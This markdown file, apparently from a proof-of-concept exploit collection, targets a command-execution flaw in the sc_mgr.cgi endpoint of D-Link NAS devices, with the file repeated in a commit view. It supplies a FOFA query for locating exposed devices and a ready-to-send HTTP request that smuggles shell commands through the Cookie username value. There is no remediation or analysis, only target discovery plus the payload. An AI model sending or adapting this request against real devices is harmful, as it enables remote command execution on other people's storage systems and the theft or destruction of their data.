POC/wpoc/D-Link/D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞.md

# D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞
D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞

## fofa
```java
body="/cgi-bin/login_mgr.cgi"  &&  body="cmd=cgi_get_ssl_info"
```

![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731336110353-da817235-136a-49bd-9e02-241d826321d4.png)

## poc
```java
GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Cookie: username=mopfdfsewo'& id & echo 'mopfdfsewo;
```

![image-20241122152945481](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221529540.png)
first commit 2025-03-04 23:12:57 +08:00			`# D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞`
			`D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞`

			`## fofa`
			```java
			`body="/cgi-bin/login_mgr.cgi" && body="cmd=cgi_get_ssl_info"`
			```

			`![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731336110353-da817235-136a-49bd-9e02-241d826321d4.png)`

			`## poc`
			```java
			`GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1`
			`Host:`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0`
			`Accept: /`
			`Accept-Encoding: gzip, deflate`
			`Connection: close`
			`Cookie: username=mopfdfsewo'& id & echo 'mopfdfsewo;`
			```

			`![image-20241122152945481](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221529540.png)`